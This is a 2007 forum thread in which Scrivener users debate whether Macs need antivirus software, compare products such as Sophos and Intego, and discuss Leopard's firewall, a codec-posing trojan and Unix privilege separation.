Antivirus....Which One?

User avatar
vic-k
Posts: 7135
Joined: Fri Apr 27, 2007 8:23 am
Platform: Mac + Windows
Location: Protesting in the nude, outside ex Red Lion TESCO Store

Fri Nov 09, 2007 2:03 am Post

Cognisant as I am, of Apple`s inexorable slide or drift, t`wards that day of reckoning, when some hack at Macworld informs the World that: There are now as many nasty little pieces of Mac-specific malware out there, as there are those aimed at MS et al; and given the sudden proliferation of slavic featured gentlemen, purchasing property in my local; allied to the iffy performance of my beautiful little, sexy as hell, iMac, inclining me to wonder if the Russian Maffia haven`t already established a bridgehead, on iMac`s hard dive; I was wondering what protection other members of Scrivener`s crew use (and do me a favour! I`m not talking safe sex. Let`s all see if we can rise above the juvenile..eh? (Not for ever,mind) ), if anything.

I`m inclined towards Sophos or Intego. but I would really appreciate having the benefit of knowing what Scriv`s crew think on this particular topic.

In anticipation, thanks.
Take care
Vic
As a professional, you, are your one and only asset. Without integrity you are worthless, but with it, you are priceless.

da
dafu
Posts: 567
Joined: Tue Jan 30, 2007 1:33 am
Platform: Mac
Location: Chicago
Contact:

Fri Nov 09, 2007 2:56 am Post

Sophos is excellent, Vic.


Dave

User avatar
Siren
Posts: 759
Joined: Mon Mar 12, 2007 11:29 am
Platform: Mac + iOS
Location: U.K.

Fri Nov 09, 2007 9:11 am Post

How can you tell if an anti-virus security package is any good if there aren't any viruses for it to detect? I'm not being facetious; I genuinely would like to know, because I have been thinking about anti-virus software for the past five years and have never taken the plunge because I couldn't decide what to get.

User avatar
antony
Posts: 905
Joined: Thu Mar 29, 2007 7:50 pm
Location: England
Contact:

Fri Nov 09, 2007 9:59 am Post

vic-k wrote:that day of reckoning, when some hack at Macworld informs the World that: There are now as many nasty little pieces of Mac-specific malware out there, as there are those aimed at MS et al


That will never happen, and you can quote me on that in five years' time if you like ;)

If you are concerned, though, as Dave says Sophos is one of the more reputable companies out there. There's also ClamXav, a freeware app based on the open-source ClamAV antivirus engine for Unix, though it hasn't yet been fully updated for Leopard.

[EDIT TO ADD: Basically, just avoid Norton/Symantec like the plague...]
Antony Johnston
antonyjohnston.com

User avatar
vic-k
Posts: 7135
Joined: Fri Apr 27, 2007 8:23 am
Platform: Mac + Windows
Location: Protesting in the nude, outside ex Red Lion TESCO Store

Fri Nov 09, 2007 10:20 am Post

Thanks for your response Dave.

Siren,
As I understand it: up to date, there have been (I think) three pieces of nasty stuff, written specifically with the Mac OS in mind; could be more by now. The only reason there aren`t that many yet, is simply that nobody has bothered to write them. But, they will.

Unprotected Macs can play,`host` to viruses aimed at other OS`s. We can infect anyone we interact with.

After I posted my request last night, I had a quick glance at the Guardian before I went to bed, and low and behold, in its IT supplement, there is an article under `Newly Asked Question` about Leopard being so full of security problems, it`s worth reading if you are upgrading. I`ll see if I can find a link on Guardian web-site when Ive posted this.

I`ll get right back with link,

Vic

antony, I`ve just seen your post, thanks. The sentiments expressed about Mac viruses belong to one of two polarised schools of thought, that are as contentious as the Mac vs Wintel debate.

I`d like to think that it could never happen but when you consider the intellectual prowess, of some of the people, just inScriv` forums alone , I think it`s odds on it`s gonna happen.

There`s an even greater threat, for me, than the Russian Maffia geting at my hard drive: My in-laws could get at it. That`s something we all should fear :cry:

Vic
Last edited by vic-k on Fri Nov 09, 2007 10:52 am, edited 3 times in total.
As a professional, you, are your one and only asset. Without integrity you are worthless, but with it, you are priceless.

cr
crimewriter
Posts: 119
Joined: Thu Mar 22, 2007 11:47 am
Location: Cotswolds

Fri Nov 09, 2007 10:34 am Post

Like you, Vic, I started to feel uneasy about my unprotected Mac and took a look at the antivirus stuff out there a week or so ago. Sophos, I thought, was aimed at the business community. I downloaded a trial of Intego, found it quick and easy to set up and operate, so paid for a licence two hours later.

As far as I can tell, it just sits there and gets on with its job without interrupting my work.

It's expensive, though, IMHO-- about £45 for a year's subscription. But with that, and my automatic remote daily backup, I worry less about losing work.

Cheers.
cw
Some quiet night when you've shirked your work because of fatigue or distraction, open a window of your house and listen. Do you hear that distant clicking sound? That's one of your competitors, pecking away at his keyboard in Paris or London or Erie, PA

User avatar
vic-k
Posts: 7135
Joined: Fri Apr 27, 2007 8:23 am
Platform: Mac + Windows
Location: Protesting in the nude, outside ex Red Lion TESCO Store

Fri Nov 09, 2007 11:12 am Post

cw,
Thanks for your response, appreciate it :wink:
Here`s the Guardian article i mentioned :

[Start Article]
Newly asked questions
Is Apple's Leopard less secure than its predecessor, Tiger?
Kate Bevan
The Guardian
Thursday November 8 2007
In some ways yes, in others no. The latest big cat flavour of OS X unleashed last month was quickly poked and prodded by security experts keen to explore any weakness they could find (since the headline "weakness in OSX!" is surefire reader magnet). They found lots: first, the firewall is turned off by default (as it has been on previous versions), and when turned on will still allow al connections - about as useful as a chocolate fireguard. Next, notes Heise Security it doesn't distinguish between trusted networks and potentially dodgy ones - unlike (gasp!) Windows Vista tinyurl.com/39bjq5). Then, you can only deny connections by application, not by service or by port - which you could in Tiger and which you really ought to be able to do. Nor can you block outbound services - and it's those that are usually a problem with exploits. The review identifies other issues to do with Apple not using the most up-to-date versions of various protocols. The gist is clear: security wonks aren't happy.

Next is the new Back To My Mac service, which lets .Mac subscribers access their Macs via .Mac from any other machine running Leopard. One click connects directly to it, without any other password. So someone who gets your .Mac account login gets your machine too, for free. "Do not go back to my Mac," warn the Open Door team (tinyurl.com/yo39gk).

A closer examination by Matasono Security (at tinyurl.com/yqt3pl) also points to weaknesses in the one-time "guest" account and even in the new "address randomisation" feature, which should makes some attacks (notably buffer overflows, a common remote exploit) more difficult. Overall, it's cold comfort - especially for those whose mums have accessed their porn stash via Back To My Mac. [End Article]

I`ll leave you all to make your own assessment of its content as I'm not competent to critique it :?

Take care
Vic
As a professional, you, are your one and only asset. Without integrity you are worthless, but with it, you are priceless.

Ta
Tacitus
Posts: 214
Joined: Sun Jun 17, 2007 10:33 am
Platform: Mac
Location: UK

Fri Nov 09, 2007 12:31 pm Post

Personally I wouldn't bother with AV. One day there may be something to get worried about but until then I'll pass. That said, from talking to those more paranoid than me, Intego is the one that gives the least trouble. Not cheap but I think the renewal costs are rather less - some £25. Norton/Symantec should be avoided at all costs.

I thought Sophos was only available to Corporates.....

The most likely Mac exploit is not a virus but a trojan. There's one currently doing the rounds posing as a Quicktime codec. Needless to say the anti-Mac brigade are touting this as proof that Macs are 'just as susceptible to viruses as Windows', ignoring the fact that it's a trojan NOT a virus. To get it you have to:

a) visit a specific porn site, although no doubt there will be others,
b) download the package when asked
c) open the package
d) supply your admin name and password when it asks, something you should never do for an unknown/untrusted package.

The installed rootkit will then phone home with your bank details and whatever else it can gather.

Apart from using common sense there is not a lot you can do to guard against this sort of exploit.
History is a nightmare from which I am trying to escape

User avatar
antony
Posts: 905
Joined: Thu Mar 29, 2007 7:50 pm
Location: England
Contact:

Fri Nov 09, 2007 4:33 pm Post

Sorry, Vic, but that Grauniad article is just repeating stuff from blogs, some of them very alarmist, and half of them debunked since they were published. No doubt that Leopard has a few bugs, but security isn't one of them - the firewall is entirely different to older versions, and behaves accordingly. There have been several more in-depth examinations of it since those articles appeared.

As for my initial "that will never happen" line, it was directly in response to the idea that one day there'll be as many virii for OSX as there are for Windows. Which really isn't going to happen, owing to their very different histories and design philosophies.

The only reason there aren`t that many yet, is simply that nobody has bothered to write them. But, they will.


Absolutely not true. The prestige, praise and reward that would be heaped upon the first hacker to successfully write a true virus for OSX is enormous. The oft-spread FUD that OSX is only secure because of its small market share is rubbish.

Now, does that mean there will never be virii on OSX? Of course not. Nothing is impossible. But the likelihood of a successful, damaging, self-propagating OSX virus remains extremely small. And there certainly aren't any about at the moment.

(The trojan that Tacitus points out is just that, a trojan, which relies on social engineering - i.e. the naivety of the user - to succeed. Anyone who downloads a 'special video codec' from a porn site and then authorises it to run with their administrator password... well, they probably shouldn't have an administrator password ;) )
Antony Johnston
antonyjohnston.com

Ta
Tacitus
Posts: 214
Joined: Sun Jun 17, 2007 10:33 am
Platform: Mac
Location: UK

Fri Nov 09, 2007 5:27 pm Post

antony wrote:........ the firewall is entirely different to older versions, and behaves accordingly. There have been several more in-depth examinations of it since those articles appeared.........

For those who like tinkering, "getting under the hood" as our American cousins have it, you can disable the new firewall and play with the Unix ipfw firewall which is still there.

Alternatively you can use Intego's Net Barrier. Amongst the other stuff is WaterRoof (free), Flying Buttress and DoorStop (both paid for). I don't use any of them, but I think the latter simply supply a GUI for the Unix stuff.

I'm not yet on Leopard as I generally wait until the .3 release before I move. Let others have the grief :-)
History is a nightmare from which I am trying to escape

User avatar
vic-k
Posts: 7135
Joined: Fri Apr 27, 2007 8:23 am
Platform: Mac + Windows
Location: Protesting in the nude, outside ex Red Lion TESCO Store

Fri Nov 09, 2007 8:26 pm Post

antony,
Thanks for your responses.
My iterations are the product of, `Everyman`s Entitlement, to a Working Misconception of Anything and Everything`, and as a consequence may `appear` to be embracing a naive and somewhat alarmist approach to the subject. That`s not the case.

I endorse the sentiments expressed in the adage, “Better Safe Than Sorry.â€
As a professional, you, are your one and only asset. Without integrity you are worthless, but with it, you are priceless.

User avatar
kewms
Posts: 7439
Joined: Fri Feb 02, 2007 5:22 pm
Platform: Mac

Fri Nov 09, 2007 10:35 pm Post

No matter whether they're written by some kid with too much time on his hands, the <insert country here> Mafia, or international terrorists, virii are just software. Sneaky, malicious software, but software nonetheless. They have to use whatever mechanisms the operating system provides to transmit, install, and run themselves.

Windows (and MS-DOS) was originally designed for standalone, non-networked, PCs. For those computers, the only way software could get onto a system was if the user put it there. Many users consider it rude if the operating system gets in the way, so Windows got out of the way and let the user do pretty much whatever he wanted. However misguided that might be. When the new networked world full of bad actors dawned, Windows was woefully unprepared and has basically been closing holes ever since.

Unix, in contrast, was designed from the very beginning for networked, multiuser environments. In those environments, you can't assume that the user knows what he is doing, and even if he does, you still can't just allow him to blunder through everyone else's data. Unix computers were also among the first to be subject to cracker attacks, for the simple reason that for a long time they were the only computers that had both network connections and information worth stealing. Thus, Unix systems draw a sharp distinction between user-level privileges and admin-level privileges. Most tasks run with user privileges, which among other things keep the task from poking its little electronic nose where it doesn't belong. I'll spare you the detailed technical explanation, but most unpleasant virus behavior requires admin privileges, and under Unix (or OS X) it's difficult for a task to get admin privileges unless a human user explicitly gives them to it.

That's where social engineering comes in, and social engineering attacks will work on ANY computer. If a piece of software can deceive the human user, it can get permission to do whatever the human himself can do. That's why on really secure systems, only a few humans have admin-level access. Joe the clueless accounting temp can't give away data that he doesn't have.

Anyway, the biggest difference between Unix (and OS X, which is Unix underneath) and Windows (pre-Vista) is that admin access is not automatic, for either humans or software. It requires not only confirmation (click a dialog box), but authentication (enter a password). That's a much higher barrier for malicious code.

No, that does not mean that OS X is an impenetrable security fortress. But it does mean that the number of ways in is far more limited, and therefore the watchers, human or electronic, have much less to worry about. Even as the number of attackers increases -- which it will, with growing market share -- that structural advantage will remain. And of course the Mac-focused security resources will also increase as market share grows.

(Windows Vista bragged about improved security. I don't know enough to comment on that.)

Katherine

User avatar
kewms
Posts: 7439
Joined: Fri Feb 02, 2007 5:22 pm
Platform: Mac

Fri Nov 09, 2007 10:43 pm Post

antony wrote:Absolutely not true. The prestige, praise and reward that would be heaped upon the first hacker to successfully write a true virus for OSX is enormous. The oft-spread FUD that OSX is only secure because of its small market share is rubbish.


Yes and no. It's true that OS X is a prestige target that probably gets plenty of attention. However, the small market share would limit the spread of any OS X virus as it could only propagate itself to other OS X systems. That makes OS X a much less lucrative target for people attempting to harvest private information, build botnets, and so forth. Prestige-motivated crackers may be interested in OS X, but the hypothetical organized crime baddies are economically motivated and may not see it as a good investment.

Katherine

bh
bhpascal
Posts: 42
Joined: Tue Nov 14, 2006 12:24 am

Fri Nov 09, 2007 10:50 pm Post

It's not about the relative number of malicious folks, it's about the underlying operating system. OS X, like any good (Unix, Linux, BSD)-based OS, actually has a sane system of users and administrators. Windows XP basically refused to run if you weren't operating as an administrator. OS X, even in accounts WITH administrator access, times out your kerberos keys (basically the permission from the OS to do high-level things) fairly quickly, so ANY sort of deep system modification requires inputting a password.

I can't even write a file to the main directory of my hard drive without putting in a password. I can manipulate things inside my home directory with reckless abandon, but the actual software that runs the operating system resides elsewhere and lives independent of my wacky little preference files.

THAT is why, as yet, I'm not burning up the RAM for an antivirus program. The only Mac trojan that's been publicized recently posed as a video codec. You'd download it, install it, and it would ask for a password. As a general rule, if you never type in a password without knowing FOR SURE from whence the program came, the odds of your computer catching anything are vanishingly small.

User avatar
vic-k
Posts: 7135
Joined: Fri Apr 27, 2007 8:23 am
Platform: Mac + Windows
Location: Protesting in the nude, outside ex Red Lion TESCO Store

Sat Nov 10, 2007 12:22 am Post

Katherine, antony, Tacitus and bhpascal,
A very big, sincere thank you for the time and effort, you`ve all put in, in order to penetrate that which lies beneath my, `Everymans ` cap.

I must have inadvertently given you all, my adnim`s password because not only have you managed to install a Trojan Horse on my cranial hard drive, there is also a Spanish Galleon and a Viking longboat (all crewed of course).

If I may ask for your views on: (a) OS X hosting non-Mac malware; (b) the impact on OS X security with Apples big time incursion into Wintelland with the adoption of the Intell Processors, Parallels and Boot Camp. I see that as a big incentive to MS Windows users to jump ship, and still retain the best of both worlds ( MS must do something right).

Of course the dirty great whacking thank you extends to all who`ve taken the trouble to share their views on this topic. I would of course appreciate all your contribution to the Wintel question aswell.

It`s 12-45am and Jameson is tapping me on the shoulder, so I`ll wish you all good night , and thanks a trillion.
Take care
vic
As a professional, you, are your one and only asset. Without integrity you are worthless, but with it, you are priceless.